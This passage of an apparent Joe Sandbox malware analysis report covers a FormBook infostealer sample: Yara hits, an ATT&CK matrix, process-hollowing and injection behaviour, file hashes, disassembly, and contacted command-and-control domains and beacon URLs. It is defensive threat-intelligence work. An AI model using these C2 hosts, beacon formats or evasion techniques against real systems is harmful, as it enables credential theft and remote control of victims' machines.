          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_0040594D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2Input Capture1Security Software Discovery251Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532909 Sample: Y1p8VPvyU2 Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 34 www.caixadepandora.club 2->34 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 3 other signatures 2->50 11 Y1p8VPvyU2.exe 17 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\msvofdls.dll, PE32 11->30 dropped 32 C:\Users\user\AppData\Local\...\6jgsfkran1lw1, DOS 11->32 dropped 62 Tries to detect virtualization through RDTSC time measurements 11->62 64 Injects a PE file into a foreign processes 11->64 15 Y1p8VPvyU2.exe 11->15         started        signatures6 process7 signatures8 66 Modifies the context of a thread in another process (thread injection) 15->66 68 Maps a DLL or memory area into another process 15->68 70 Sample uses process hollowing technique 15->70 72 Queues an APC in another process (thread injection) 15->72 18 explorer.exe 15->18 injected process9 dnsIp10 36 www.fastbest.host 45.8.125.8, 49810, 80 SELECTELRU Russian Federation 18->36 38 www.tyjgfuke.com 23.110.214.34, 80 LEASEWEB-USA-LAX-11US United States 18->38 40 5 other IPs or domains 18->40 52 System process connects to network (likely due to code injection or exploit) 18->52 22 cscript.exe 12 18->22         started        signatures11 process12 dnsIp13 42 www.tyjgfuke.com 22->42 54 Self deletion via cmd delete 22->54 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Y1p8VPvyU2.exe35%VirustotalBrowse
          Y1p8VPvyU2.exe9%MetadefenderBrowse
          Y1p8VPvyU2.exe64%ReversingLabsWin32.Trojan.Swotter

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll50%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.Y1p8VPvyU2.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Y1p8VPvyU2.exe.2420000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          6.2.cscript.exe.592796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.Y1p8VPvyU2.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.Y1p8VPvyU2.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Y1p8VPvyU2.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.Y1p8VPvyU2.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          6.2.cscript.exe.35c8670.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.Y1p8VPvyU2.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          yr-golf.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom0%Avira URL Cloudsafe
          https://fastbest.host0%Avira URL Cloudsafe
          http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh0%Avira URL Cloudsafe
          www.tgalegail.quest/n6fr/0%Avira URL Cloudsafe
          http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB0%Avira URL Cloudsafe
          http://www.tyjgfuke.com/$t0%Avira URL Cloudsafe
          http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.tyjgfuke.com
          		23.110.214.34
          		truetrue
            		unknown
            assisttm.com
            		34.102.136.180
            		truefalse
              		unknown
              yr-golf.com
              		34.102.136.180
              		truefalseunknown
              www.fastbest.host
              		45.8.125.8
              		truetrue
                		unknown
                www.caixadepandora.club
                		137.184.111.224
                		truefalse
                  		unknown
                  www.assisttm.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.gsjbd1.club
                    		unknown
                    		unknowntrue
                      		unknown
                      www.yr-golf.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzomtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQhfalse
                        • Avira URL Cloud: safe
                        		unknown
                        www.tgalegail.quest/n6fr/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBBfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://fastbest.hostcscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorY1p8VPvyU2.exefalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorY1p8VPvyU2.exefalse
                            		high
                            https://browsehappy.com/cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpfalse
                              		high
                              http://www.tyjgfuke.com/$tcscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBtcscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://via.placeholder.com/100cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                34.102.136.180
                                		assisttm.comUnited States
                                		15169GOOGLEUSfalse
                                23.110.214.34
                                		www.tyjgfuke.comUnited States
                                		395954LEASEWEB-USA-LAX-11UStrue
                                45.8.125.8
                                		www.fastbest.hostRussian Federation
                                		49505SELECTELRUtrue

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:532909
                                Start date:02.12.2021
                                Start time:19:58:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Y1p8VPvyU2 (renamed file extension from none to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/2@7/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 21.8% (good quality ratio 19.7%)
                                • Quality average: 74.7%
                                • Quality standard deviation: 31.6%
                                HCA Information:
                                • Successful, ratio: 87%
                                • Number of executed functions: 103
                                • Number of non-executed functions: 91
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                www.fastbest.hostMedtronics Product catalog and prices_pdf.exeGet hashmaliciousBrowse
                                • 194.54.163.227

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                LEASEWEB-USA-LAX-11USRFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                • 108.187.86.48
                                YjKK5XYBzBGet hashmaliciousBrowse
                                • 172.255.161.176
                                JUyE95BLaLGet hashmaliciousBrowse
                                • 172.255.161.168
                                9hyE41yNDBGet hashmaliciousBrowse
                                • 23.86.78.90
                                triage_dropped_file.exeGet hashmaliciousBrowse
                                • 23.110.31.106
                                vbc.exeGet hashmaliciousBrowse
                                • 23.110.31.106
                                xd.x86Get hashmaliciousBrowse
                                • 23.80.138.175
                                eKmL8hvXz2Get hashmaliciousBrowse
                                • 108.187.220.76
                                TsOl2c6Yc6Get hashmaliciousBrowse
                                • 23.83.26.237
                                SALES CONFIRMATION 153_154 SN.xlsxGet hashmaliciousBrowse
                                • 23.110.31.106
                                oQANZnrt9dGet hashmaliciousBrowse
                                • 23.83.26.245
                                xzKS6P1qDo.exeGet hashmaliciousBrowse
                                • 23.104.53.233
                                apep.mipsGet hashmaliciousBrowse
                                • 108.187.80.246
                                7H5yVEypQXGet hashmaliciousBrowse
                                • 23.85.79.155
                                7OjVU04f8q.exeGet hashmaliciousBrowse
                                • 23.110.31.75
                                DuxgwH47QB.exeGet hashmaliciousBrowse
                                • 23.110.128.234
                                ORDER.docGet hashmaliciousBrowse
                                • 23.110.128.234
                                SWIFT-MLSB-11,546__doc.exeGet hashmaliciousBrowse
                                • 23.110.95.195
                                BwJriVGrt5.exeGet hashmaliciousBrowse
                                • 23.110.31.77
                                29383773738387477474774.exeGet hashmaliciousBrowse
                                • 142.234.161.17
                                SELECTELRUuATT8vAUK9.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                1Y0xc70fbX.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                SecuriteInfo.com.Packed-GDV0304D0F07C5D.24466.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                SecuriteInfo.com.W32.AIDetect.malware1.19028.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                8VvzOu0uHY.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                koCttsCjGY.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                oCBC1EaZ9G.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                LF6pwW1lIz.exeGet hashmaliciousBrowse
                                • 37.9.13.169
                                DvWDF1pMu7.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                gSSvIiK2kn.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                gjYAgorDLm.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                zPeXh7zbd3.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                2KWErWhXoQ.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                Nh3xqMPynb.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                MN5wZ55I17.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                QMn13jz6nj.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                v72n86vFFq.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                DOC-BRAD _ 26TH_NOVEMBER_2021 _.HTMGet hashmaliciousBrowse
                                • 92.53.68.205
                                t2yFh0lOxM.exeGet hashmaliciousBrowse
                                • 185.189.167.130
                                vwLliS25F5.exeGet hashmaliciousBrowse
                                • 95.213.165.229

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllproduct list.xlsxGet hashmaliciousBrowse
                                  C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1product list.xlsxGet hashmaliciousBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1
                                    Process:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    File Type:DOS executable (COM, 0x8C-variant)
                                    Category:dropped
                                    Size (bytes):217235
                                    Entropy (8bit):7.9937809161987765
                                    Encrypted:true
                                    SSDEEP:6144:W4FmTjet9fxOzh9Ky33TDMfVwr37hQnll6V:GE9YzhogvMfm3olI
                                    MD5:75ACE7B8440CE829D653343E18EAE33A
                                    SHA1:09F23DD8962701C4D5213E2A7AA395985E8963DE
                                    SHA-256:A4CAE10880D0DD180CC5B92E38F449EE244E83186725BD1257312DCC05AA4E48
                                    SHA-512:F4BC54E1396D9AF6E61ED270B068D60475F357BD3258ABF4E659D75FD81D27D173BBB2126D646BA51736B3EA82CEC03F5D4A1D9D8FEFC6E1599333827B7AB2A0
                                    Malicious:false
                                    Joe Sandbox View:
                                    • Filename: product list.xlsx, Detection: malicious, Browse
                                    Reputation:low
                                    Preview: ..;.7w.GJ0s...TS.G.4.%..zI..E..,...f.....be.........T{..;Q...........";.D=..Z.t...!...Gkl..Jy...;.G.......4.$...5.\..}M&......B.#}..f...\...fj.=4.8.@..........d.JmH...8A...Ua6..G...vr.jC..c..\.^ .......w...y..1.6....j#.B}.G.Z=..I.O.. .".XN...]..7w.\..............G..E.T.,k...f..,..be........&T{...E......W..U^.j...}...N..oU.y........P)..... P..S%..4.$...5....,.....9...D..F?..^.e.c..`c.m.@o.%n_8.L..l:..w.8A...U..D...v..jC..c......?..q...w...y....@....j.B}.J.Zx..I.O.....".XN....]..7w.y..K............3..E..,...f.....be........&T{...E......W..U^.j...}...N..oU.y........P)..... P..S%..4.$...5....,.....9...D..F?..^.e.c..`c.m.@o.%n_8.L..lJmH...8AV..U..D.n..vr.jC..c......?..q...w...y....@....j.B}.J.Zx..I.O.....".XN....]..7w.y..K............3..E..,...f.....be........&T{...E......W..U^.j...}...N..oU.y........P)..... P..S%..4.$...5....,.....9...D..F?..^.e.c..`c.m.@o.%n_8.L..lJmH...8AV..U..D.n..vr.jC..c......?..q...w...y....@....
                                    C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll
                                    Process:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):137728
                                    Entropy (8bit):6.411397085063496
                                    Encrypted:false
                                    SSDEEP:1536:gmPsLrHeJTgGJPLlr0VOGfTRisu0/8UgCUoXD2/Y+z4o8QqbfvZ2BksWjcd8EmjN:sLz0gGJPprwr/dXDZE2Z2B8E8
                                    MD5:4881ED27473CD15B3FCC072F11465658
                                    SHA1:37A29E690965E233CA4B89538A77188DC2048BFF
                                    SHA-256:13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
                                    SHA-512:ED198137652861DB9A6595FEDC6E376EA2BC730E5D6BC8D58B203F07814200529597AD5B24EE8409942222CB18674DDE38422B82FFCD057E63ACC9233E6EAFF3
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Joe Sandbox View:
                                    • Filename: product list.xlsx, Detection: malicious, Browse
                                    Reputation:low
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;6.A.W...W...W..r.s.^W..r.M.oW..r.r..W....\.|W....Y.lW...W...W......~W......~W....m.~W......~W..Rich.W..................PE..L....R.a...........!.........................................................p......T...................................L............`..............................0...............................P...@...............<............................text...L........................... ..`.rdata...R.......T..................@..@.data....U.......:..................@....rsrc........`......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.939366323187133
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Y1p8VPvyU2.exe
                                    File size:318467
                                    MD5:83be105c9fa2427bd6079f5d19659596
                                    SHA1:1430baa740d2cd40a507cbfa8fe62e3d78424315
                                    SHA256:8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
                                    SHA512:09a2c3c9d9b147e6c25d824c931b2c0f4f9daaccdbde4a28ad0955be63642e11cb23df8f1d85e719b2b0b535e55b0d2cfb7168312c0f082d8b4f9d1072efdd3e
                                    SSDEEP:6144:rGiw8TRbniXVRaPCuyCxGfYy33TGBbXU2gx7hQn+l6aFu00D/4e3aKize/q:bTwXVRACauYgFo+q0K4VKizR
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                    File Icon

                                    Icon Hash:b2a88c96b2ca6a72

                                    Static PE Info

                                    General

                                    Entrypoint:0x4030e3
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:7fa974366048f9c551ef45714595665e

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 00000180h
                                    push ebx
                                    push ebp
                                    push esi
                                    xor ebx, ebx
                                    push edi
                                    mov dword ptr [esp+18h], ebx
                                    mov dword ptr [esp+10h], 00409158h
                                    xor esi, esi
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [00407030h]
                                    push 00008001h
                                    call dword ptr [004070B0h]
                                    push ebx
                                    call dword ptr [0040727Ch]
                                    push 00000008h
                                    mov dword ptr [0042EC18h], eax
                                    call 00007F6505057D48h
                                    mov dword ptr [0042EB64h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 00428F90h
                                    call dword ptr [00407158h]
                                    push 0040914Ch
                                    push 0042E360h
                                    call 00007F65050579FFh
                                    call dword ptr [004070ACh]
                                    mov edi, 00434000h
                                    push eax
                                    push edi
                                    call 00007F65050579EDh
                                    push ebx
                                    call dword ptr [0040710Ch]
                                    cmp byte ptr [00434000h], 00000022h
                                    mov dword ptr [0042EB60h], eax
                                    mov eax, edi
                                    jne 00007F650505522Ch
                                    mov byte ptr [esp+14h], 00000022h
                                    mov eax, 00434001h
                                    push dword ptr [esp+14h]
                                    push eax
                                    call 00007F65050574E0h
                                    push eax
                                    call dword ptr [0040721Ch]
                                    mov dword ptr [esp+1Ch], eax
                                    jmp 00007F6505055285h
                                    cmp cl, 00000020h
                                    jne 00007F6505055228h
                                    inc eax
                                    cmp byte ptr [eax], 00000020h
                                    je 00007F650505521Ch
                                    cmp byte ptr [eax], 00000022h
                                    mov byte ptr [eax+eax+00h], 00000000h

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x900.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

